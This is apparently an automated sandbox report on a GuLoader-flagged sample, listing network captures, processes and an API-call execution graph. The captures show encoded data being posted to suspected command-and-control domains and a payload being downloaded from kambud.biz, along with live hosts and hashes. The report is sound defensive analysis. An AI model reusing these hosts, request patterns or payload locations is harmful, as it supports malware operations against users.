                                                                                                                                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYmFiNDYxNmEtNGM3Yy00NGFjLWIyYTMtNzI5YzU4Y2MzMDE3IiwicGFnZV90aW1lIjoxNzI5NTk2NT


                                                                                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                                            17    192.168.2.5    49994    13.248.169.48    80    764    C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                                                                                            Oct 22, 2024 13:28:49.957240105 CEST    673    OUT    POST /t4fd/ HTTP/1.1
                                                                                                                                            Host: www.3808.app
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 207
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.3808.app
                                                                                                                                            Referer: http://www.3808.app/t4fd/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Ascii: -v4puN=eU2xu6PtXnpIrrMGf08aB3QKBe3EdCHXZWJKxWKB5oM1A3qEu6fP8nBWI63mS2pB+h8Nduj+m9TTALDzv5nyPt5xWG419vaLIWJYv8VpQpyIVx2wPiziPFxR9ifsmcbLu6eolqkwd52pHIF/2uRjjIcyteAsJigJ+pZfxOUxvrl89OWKbkkcJFt0gxXXlQqqTM+o+fw=


                                                                                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                                            18    192.168.2.5    49995    13.248.169.48    80    764    C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                                                                                            Oct 22, 2024 13:28:52.649250984 CEST    693    OUT    POST /t4fd/ HTTP/1.1
                                                                                                                                            Host: www.3808.app
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 227
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.3808.app
                                                                                                                                            Referer: http://www.3808.app/t4fd/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Ascii: -v4puN=eU2xu6PtXnpIrIUGcXUaHXQLK+3EUiHbZWVKxX+R5ek1DWaEv7fP5nBWAa3pW2p0+hwjdrD+m+vTALTzuIn9O95zdm5TzPaLIWJYv4FPQpqIVBGwOHThMFxS1CfsicbPu6eOlrJVd6epHKN/28pgoIcwi+BDYigH85Vi4NxE+twI1YngBGs0alBMwifg0gLDJvuYgIlpCVI6/dNOPOe7RkLpYagf


                                                                                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                                            19    192.168.2.5    49996    13.248.169.48    80    764    C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                                                                                            Oct 22, 2024 13:28:55.200300932 CEST    1710    OUT    POST /t4fd/ HTTP/1.1
                                                                                                                                            Host: www.3808.app
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 1243
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.3808.app
                                                                                                                                            Referer: http://www.3808.app/t4fd/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Ascii: -v4puN= [TRUNCATED]


                                                                                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                                                                            20    192.168.2.5    49997    13.248.169.48    80    764    C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                                                                                            Oct 22, 2024 13:28:57.748194933 CEST    426    OUT    GET /t4fd/?-v4puN=TWeRtNzMfmNEvdcXbWkMHnJ/F6flcjr/el8zumz71ZoVA0OJu/n5oRxSGdedcGZFrD4yQtyH27/zNp/ws5+MDNRefURZz6yILQV3scYXQq64Zh/qDiP6EAtr8QHYkOuA6w==&vd=fhUlwfGxBn-tt HTTP/1.1
                                                                                                                                            Host: www.3808.app
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Oct 22, 2024 13:28:58.410136938 CEST    411    IN    HTTP/1.1 200 OK
                                                                                                                                            Server: openresty
                                                                                                                                            Date: Tue, 22 Oct 2024 11:28:58 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 271
                                                                                                                                            Connection: close
                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?-v4puN=TWeRtNzMfmNEvdcXbWkMHnJ/F6flcjr/el8zumz71ZoVA0OJu/n5oRxSGdedcGZFrD4yQtyH27/zNp/ws5+MDNRefURZz6yILQV3scYXQq64Zh/qDiP6EAtr8QHYkOuA6w==&vd=fhUlwfGxBn-tt"}</script></head></html>


                                                                                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port
                                                                                                                                            21    192.168.2.5    49998    3.33.130.190    80
                                                                                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                                                                                            Oct 22, 2024 13:29:03.930412054 CEST    694    OUT    POST /bx4s/ HTTP/1.1
                                                                                                                                            Host: www.yourwebbuzz.net
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 207
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.yourwebbuzz.net
                                                                                                                                            Referer: http://www.yourwebbuzz.net/bx4s/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Ascii: -v4puN=gcX+x822hmqXrVmwiqDUcIRfnSvtzRkhMa+u67M22a31QryI0k5UKNmBW57QXW2J4hNqVPZhdvPwc20ze2AFmok3xqaYqcKKIxb+jQ5HChVqR/d0IskoCfApZdRc+C43J74/NrKQ5Eo4b/fygbnYdLe1ERBuFKVnBE0xqzenb1nTXv6IzMuxNQdfXt5iOxo5afE4xt4=


                                                                                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port
                                                                                                                                            22    192.168.2.5    49999    3.33.130.190    80
                                                                                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                                                                                            Oct 22, 2024 13:29:06.483345985 CEST    714    OUT    POST /bx4s/ HTTP/1.1
                                                                                                                                            Host: www.yourwebbuzz.net
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 227
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.yourwebbuzz.net
                                                                                                                                            Referer: http://www.yourwebbuzz.net/bx4s/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Data Ascii: -v4puN=gcX+x822hmqXq0WwkJrUaoReoyvt9Bk9Maiu66Im1oj1QLCI1gVULNmBdZ7fKG2O4hBMVKxhdvrwcywzeG8Gm4k18Kaak8KKIxb+jQd9ChNqROt0INkrdvAqPNRc1i47J74BNqX35HA4b6jygOTbEbevLxAAA4YdBHk5ljv2FGDyf5LipumZewxnH+xVfBJQA8UIv6sXDUlYZSYNoAsgpF5/DWmS


                                                                                                                                            Session ID    Source IP    Source Port    Destination IP    Destination Port
                                                                                                                                            23    192.168.2.5    50000    3.33.130.190    80
                                                                                                                                            Timestamp    Bytes transferred    Direction    Data
                                                                                                                                            Oct 22, 2024 13:29:09.029290915 CEST    1731    OUT    POST /bx4s/ HTTP/1.1
                                                                                                                                            Host: www.yourwebbuzz.net
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Connection: close
                                                                                                                                            Content-Length: 1243
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Origin: http://www.yourwebbuzz.net
                                                                                                                                            Referer: http://www.yourwebbuzz.net/bx4s/
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36


                                                                                                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                                            24          192.168.2.5  50001        3.33.130.190    80
                                                                                                                                            Timestamp                             Bytes transferred  Direction  Data
                                                                                                                                            Oct 22, 2024 13:29:11.569258928 CEST  433                OUT        GET /bx4s/?-v4puN=te/eyMGfj2LevQDtupbEc4IvglH1yiUBN7XUzJxRyOvhTaKlw0FBVO2yb8CkSWCznwZRCZkdWablXAYeUkNRjY0I5ry1q7WyBxeQiSsAbTFcbcoKMMkLDPAENOgL+G9ORQ==&vd=fhUlwfGxBn-tt HTTP/1.1
                                                                                                                                            Host: www.yourwebbuzz.net
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-US,en
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; LGL33L/V100 Build/LRX21Y) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/38.0.2125.102 Mobile Safari/537.36
                                                                                                                                            Oct 22, 2024 13:29:12.188291073 CEST  411                IN         HTTP/1.1 200 OK
                                                                                                                                            Server: openresty
                                                                                                                                            Date: Tue, 22 Oct 2024 11:29:12 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 271
                                                                                                                                            Connection: close
                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?-v4puN=te/eyMGfj2LevQDtupbEc4IvglH1yiUBN7XUzJxRyOvhTaKlw0FBVO2yb8CkSWCznwZRCZkdWablXAYeUkNRjY0I5ry1q7WyBxeQiSsAbTFcbcoKMMkLDPAENOgL+G9ORQ==&vd=fhUlwfGxBn-tt"}</script></head></html>


                                                                                                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                                            0           192.168.2.5  49876        185.17.43.223   443               1216  C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            Timestamp                Bytes transferred  Direction  Data
                                                                                                                                            2024-10-22 11:26:46 UTC  172                OUT        GET /uCEVRNHZgMA26.bin HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                            Host: kambud.biz
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            2024-10-22 11:26:47 UTC  328                IN         HTTP/1.1 200 OK
                                                                                                                                            Date: Tue, 22 Oct 2024 11:26:47 GMT
                                                                                                                                            Server: Apache
                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                            Connection: Upgrade, close
                                                                                                                                            Last-Modified: Tue, 22 Oct 2024 10:10:30 GMT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Content-Length: 287296
                                                                                                                                            Vary: Accept-Encoding,User-Agent
                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                            Content-Type: application/octet-stream


                                                                                                                                            Target ID:0
                                                                                                                                            Start time:07:25:54
                                                                                                                                            Start date:22/10/2024
                                                                                                                                            Path:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\zamowienie.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:775'216 bytes
                                                                                                                                            MD5 hash:48F82F781035DEF809B0CDB2F66097A9
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2435885467.0000000005488000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:3
                                                                                                                                            Start time:07:26:33
                                                                                                                                            Start date:22/10/2024
                                                                                                                                            Path:C:\Users\user\Desktop\zamowienie.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\zamowienie.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:775'216 bytes
                                                                                                                                            MD5 hash:48F82F781035DEF809B0CDB2F66097A9
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:low
                                                                                                                                            Has exited:true

                                                                                                                                            Target ID:6
                                                                                                                                            Start time:07:27:16
                                                                                                                                            Start date:22/10/2024
                                                                                                                                            Path:C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe"
                                                                                                                                            Imagebase:0xd70000
                                                                                                                                            File size:140'800 bytes
                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                            Has elevated privileges:false
                                                                                                                                            Has administrator privileges:false
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high
                                                                                                                                            Has exited:false

                                                                                                                                            Target ID:7
Start time:07:27:18
Start date:22/10/2024
Path:C:\Windows\SysWOW64\verclsid.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\SysWOW64\verclsid.exe"
Imagebase:0x3b0000
File size:11'776 bytes
MD5 hash:190A347DF06F8486F193ADA0E90B49C5
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:false

Target ID:8
Start time:07:27:32
Start date:22/10/2024
Path:C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\lbsKAnNXXRCkGovUHbOIgkVZSJXJRCdfGlZZiMElLQijMYPOVpLG\dmQRVBQMPL.exe"
Imagebase:0xd70000
File size:140'800 bytes
MD5 hash:32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:9
Start time:07:27:44
Start date:22/10/2024
Path:C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:0x7ff79f9e0000
File size:676'768 bytes
MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true


Execution Graph

Execution Coverage:21.9%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:17.2%
Total number of Nodes:1578
Total number of Limit Nodes:54
SetDlgItemTextA 5699->5701 5702 404bc7 5699->5702 5701->5695 5703 404ca7 24 API calls 5702->5703 5703->5695 5704 404c14 5704->5705 5706 404849 SendMessageA 5704->5706 5705->5658 5706->5705 5707->5653 5708->5677 5709->5662 5710->5679 5711->5688 5712->5704 5713 401ff0 5714 402c5e 21 API calls 5713->5714 5715 401ff7 5714->5715 5716 406751 2 API calls 5715->5716 5717 401ffd 5716->5717 5719 40200f 5717->5719 5720 40631c wsprintfA 5717->5720 5720->5719 5088 4034f1 SetErrorMode GetVersionExA 5089 403543 GetVersionExA 5088->5089 5091 403582 5088->5091 5090 40355f 5089->5090 5089->5091 5090->5091 5092 403606 5091->5092 5093 4067e6 5 API calls 5091->5093 5094 406778 3 API calls 5092->5094 5093->5092 5095 40361c lstrlenA 5094->5095 5095->5092 5096 40362c 5095->5096 5097 4067e6 5 API calls 5096->5097 5098 403633 5097->5098 5099 4067e6 5 API calls 5098->5099 5100 40363a 5099->5100 5101 4067e6 5 API calls 5100->5101 5102 403646 #17 OleInitialize SHGetFileInfoA 5101->5102 5177 4063be lstrcpynA 5102->5177 5105 403694 GetCommandLineA 5178 4063be lstrcpynA 5105->5178 5107 4036a6 5108 405d7b CharNextA 5107->5108 5109 4036cd CharNextA 5108->5109 5117 4036dc 5109->5117 5110 4037a2 5111 4037b6 GetTempPathA 5110->5111 5179 4034c0 5111->5179 5113 4037ce 5114 4037d2 GetWindowsDirectoryA lstrcatA 5113->5114 5115 403828 DeleteFileA 5113->5115 5118 4034c0 12 API calls 5114->5118 5189 402f81 GetTickCount GetModuleFileNameA 5115->5189 5116 405d7b CharNextA 5116->5117 5117->5110 5117->5116 5121 4037a4 5117->5121 5120 4037ee 5118->5120 5120->5115 5124 4037f2 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 5120->5124 5275 4063be lstrcpynA 5121->5275 5122 40383b 5130 405d7b CharNextA 5122->5130 5159 4038c0 5122->5159 5169 4038d0 5122->5169 5126 4034c0 12 API calls 5124->5126 5128 403820 5126->5128 5128->5115 5128->5169 5134 403855 5130->5134 5131 403a41 5133 403a49 GetCurrentProcess OpenProcessToken 5131->5133 5141 403abf ExitProcess 5131->5141 5132 4038ea 5135 405ad4 
MessageBoxIndirectA 5132->5135 5136 403a60 LookupPrivilegeValueA AdjustTokenPrivileges 5133->5136 5137 403a8f 5133->5137 5138 40389a 5134->5138 5139 4038ff 5134->5139 5140 4038f7 ExitProcess 5135->5140 5136->5137 5143 4067e6 5 API calls 5137->5143 5144 405e3e 18 API calls 5138->5144 5145 405a3f 5 API calls 5139->5145 5146 403a96 5143->5146 5147 4038a6 5144->5147 5148 403904 lstrlenA 5145->5148 5149 403aab ExitWindowsEx 5146->5149 5151 403ab8 5146->5151 5147->5169 5276 4063be lstrcpynA 5147->5276 5287 4063be lstrcpynA 5148->5287 5149->5141 5149->5151 5154 40140b 2 API calls 5151->5154 5153 40391c 5156 403934 5153->5156 5288 4063be lstrcpynA 5153->5288 5154->5141 5155 4038b5 5277 4063be lstrcpynA 5155->5277 5160 403952 wsprintfA 5156->5160 5174 403980 5156->5174 5219 403bc7 5159->5219 5161 406451 21 API calls 5160->5161 5161->5156 5162 4059c8 2 API calls 5162->5174 5163 405a22 2 API calls 5163->5174 5164 403990 GetFileAttributesA 5167 40399c DeleteFileA 5164->5167 5164->5174 5165 4039c8 SetCurrentDirectoryA 5166 406197 40 API calls 5165->5166 5168 4039d7 CopyFileA 5166->5168 5167->5174 5168->5169 5168->5174 5278 403ad5 5169->5278 5170 405b80 71 API calls 5170->5174 5171 406197 40 API calls 5171->5174 5172 406451 21 API calls 5172->5174 5173 405a57 2 API calls 5173->5174 5174->5156 5174->5160 5174->5162 5174->5163 5174->5164 5174->5165 5174->5169 5174->5170 5174->5171 5174->5172 5174->5173 5175 403a31 CloseHandle 5174->5175 5176 406751 2 API calls 5174->5176 5175->5169 5176->5174 5177->5105 5178->5107 5180 4066b8 5 API calls 5179->5180 5182 4034cc 5180->5182 5181 4034d6 5181->5113 5182->5181 5183 405d50 3 API calls 5182->5183 5184 4034de 5183->5184 5185 405a22 2 API calls 5184->5185 5186 4034e4 5185->5186 5187 405f80 2 API calls 5186->5187 5188 4034ef 5187->5188 5188->5113 5289 405f51 GetFileAttributesA CreateFileA 5189->5289 5191 402fc4 5218 402fd1 5191->5218 5290 4063be lstrcpynA 5191->5290 5193 402fe7 5194 405d97 2 API calls 5193->5194 5195 402fed 5194->5195 5291 
4063be lstrcpynA 5195->5291 5197 402ff8 GetFileSize 5198 40300f 5197->5198 5213 4030f2 5197->5213 5201 403493 ReadFile 5198->5201 5203 40318f 5198->5203 5210 402ee2 36 API calls 5198->5210 5198->5213 5198->5218 5199 402ee2 36 API calls 5200 4030fb 5199->5200 5202 403137 GlobalAlloc 5200->5202 5200->5218 5293 4034a9 SetFilePointer 5200->5293 5201->5198 5204 40314e 5202->5204 5206 402ee2 36 API calls 5203->5206 5209 405f80 2 API calls 5204->5209 5206->5218 5207 403118 5208 403493 ReadFile 5207->5208 5211 403123 5208->5211 5212 40315f CreateFileA 5209->5212 5210->5198 5211->5202 5211->5218 5214 403199 5212->5214 5212->5218 5213->5199 5292 4034a9 SetFilePointer 5214->5292 5216 4031a7 5217 403222 48 API calls 5216->5217 5217->5218 5218->5122 5220 4067e6 5 API calls 5219->5220 5221 403bdb 5220->5221 5222 403bf3 5221->5222 5225 403be1 5221->5225 5223 4062a5 3 API calls 5222->5223 5224 403c1e 5223->5224 5226 403c3c lstrcatA 5224->5226 5229 4062a5 3 API calls 5224->5229 5302 40631c wsprintfA 5225->5302 5228 403bf1 5226->5228 5294 403e8c 5228->5294 5229->5226 5232 405e3e 18 API calls 5233 403c6e 5232->5233 5234 403cf7 5233->5234 5237 4062a5 3 API calls 5233->5237 5235 405e3e 18 API calls 5234->5235 5236 403cfd 5235->5236 5238 403d0d LoadImageA 5236->5238 5240 406451 21 API calls 5236->5240 5239 403c9a 5237->5239 5241 403db3 5238->5241 5242 403d34 RegisterClassA 5238->5242 5239->5234 5243 403cb6 lstrlenA 5239->5243 5247 405d7b CharNextA 5239->5247 5240->5238 5246 40140b 2 API calls 5241->5246 5244 403dbd 5242->5244 5245 403d6a SystemParametersInfoA CreateWindowExA 5242->5245 5248 403cc4 lstrcmpiA 5243->5248 5249 403cea 5243->5249 5244->5169 5245->5241 5250 403db9 5246->5250 5251 403cb4 5247->5251 5248->5249 5252 403cd4 GetFileAttributesA 5248->5252 5253 405d50 3 API calls 5249->5253 5250->5244 5255 403e8c 22 API calls 5250->5255 5251->5243 5254 403ce0 5252->5254 5256 403cf0 5253->5256 5254->5249 5257 405d97 2 API calls 5254->5257 5258 403dca 5255->5258 5303 4063be lstrcpynA 
5256->5303 5257->5249 5260 403dd6 ShowWindow 5258->5260 5261 403e59 5258->5261 5263 406778 3 API calls 5260->5263 5304 4055d4 OleInitialize 5261->5304 5265 403dee 5263->5265 5264 403e5f 5267 403e63 5264->5267 5268 403e7b 5264->5268 5266 403dfc GetClassInfoA 5265->5266 5269 406778 3 API calls 5265->5269 5271 403e10 GetClassInfoA RegisterClassA 5266->5271 5272 403e26 DialogBoxParamA 5266->5272 5267->5244 5274 40140b 2 API calls 5267->5274 5270 40140b 2 API calls 5268->5270 5269->5266 5270->5244 5271->5272 5273 40140b 2 API calls 5272->5273 5273->5244 5274->5244 5275->5111 5276->5155 5277->5159 5279 403af0 5278->5279 5280 403ae6 CloseHandle 5278->5280 5281 403b04 5279->5281 5282 403afa CloseHandle 5279->5282 5280->5279 5312 403b32 5281->5312 5282->5281 5285 405b80 71 API calls 5286 4038d8 OleUninitialize 5285->5286 5286->5131 5286->5132 5287->5153 5288->5156 5289->5191 5290->5193 5291->5197 5292->5216 5293->5207 5295 403ea0 5294->5295 5311 40631c wsprintfA 5295->5311 5297 403f11 5298 403f45 22 API calls 5297->5298 5300 403f16 5298->5300 5299 403c4c 5299->5232 5300->5299 5301 406451 21 API calls 5300->5301 5301->5300 5302->5228 5303->5234 5305 4044aa SendMessageA 5304->5305 5307 4055f7 5305->5307 5306 4044aa SendMessageA 5308 405630 OleUninitialize 5306->5308 5309 401389 2 API calls 5307->5309 5310 40561e 5307->5310 5308->5264 5309->5307 5310->5306 5311->5297 5313 403b40 5312->5313 5314 403b09 5313->5314 5315 403b45 FreeLibrary GlobalFree 5313->5315 5314->5285 5315->5314 5315->5315 5721 73402c73 5722 73402c8b 5721->5722 5723 734015c4 2 API calls 5722->5723 5724 73402ca6 5723->5724 5725 4014f4 SetForegroundWindow 5726 402aea 5725->5726 5330 405476 5331 405486 5330->5331 5332 40549a 5330->5332 5333 4054e3 5331->5333 5334 40548c 5331->5334 5335 4054a2 IsWindowVisible 5332->5335 5342 4054c2 5332->5342 5336 4054e8 CallWindowProcA 5333->5336 5337 4044aa SendMessageA 5334->5337 5335->5333 5338 4054af 5335->5338 5339 405496 5336->5339 5337->5339 5340 404db1 5 API calls 
5338->5340 5341 4054b9 5340->5341 5341->5342 5342->5336 5343 404e31 4 API calls 5342->5343 5343->5333 5344 40177e 5345 402c5e 21 API calls 5344->5345 5346 401785 5345->5346 5347 4017a3 5346->5347 5348 4017ab 5346->5348 5384 4063be lstrcpynA 5347->5384 5385 4063be lstrcpynA 5348->5385 5351 4017a9 5355 4066b8 5 API calls 5351->5355 5352 4017b6 5353 405d50 3 API calls 5352->5353 5354 4017bc lstrcatA 5353->5354 5354->5351 5368 4017c8 5355->5368 5356 406751 2 API calls 5356->5368 5357 401809 5358 405f2c 2 API calls 5357->5358 5358->5368 5360 4017df CompareFileTime 5360->5368 5361 4018a3 5362 405502 28 API calls 5361->5362 5363 4018ad 5362->5363 5366 403222 48 API calls 5363->5366 5364 405502 28 API calls 5373 40188f 5364->5373 5365 4063be lstrcpynA 5365->5368 5367 4018c0 5366->5367 5369 4018d4 SetFileTime 5367->5369 5371 4018e6 CloseHandle 5367->5371 5368->5356 5368->5357 5368->5360 5368->5361 5368->5365 5370 406451 21 API calls 5368->5370 5378 405ad4 MessageBoxIndirectA 5368->5378 5382 40187a 5368->5382 5383 405f51 GetFileAttributesA CreateFileA 5368->5383 5369->5371 5370->5368 5372 4018f7 5371->5372 5371->5373 5374 4018fc 5372->5374 5375 40190f 5372->5375 5376 406451 21 API calls 5374->5376 5377 406451 21 API calls 5375->5377 5379 401904 lstrcatA 5376->5379 5380 401917 5377->5380 5378->5368 5379->5380 5380->5373 5381 405ad4 MessageBoxIndirectA 5380->5381 5381->5373 5382->5364 5382->5373 5383->5368 5384->5351 5385->5352 5734 40167e 5735 402c5e 21 API calls 5734->5735 5736 401684 5735->5736 5737 406751 2 API calls 5736->5737 5738 40168a 5737->5738 5739 40197e 5740 402c3c 21 API calls 5739->5740 5741 401985 5740->5741 5742 402c3c 21 API calls 5741->5742 5743 401992 5742->5743 5744 402c5e 21 API calls 5743->5744 5745 4019a9 lstrlenA 5744->5745 5747 4019b9 5745->5747 5746 4019f9 5747->5746 5751 4063be lstrcpynA 5747->5751 5749 4019e9 5749->5746 5750 4019ee lstrlenA 5749->5750 5750->5746 5751->5749 5752 401000 5753 401037 BeginPaint GetClientRect 5752->5753 5754 40100c 
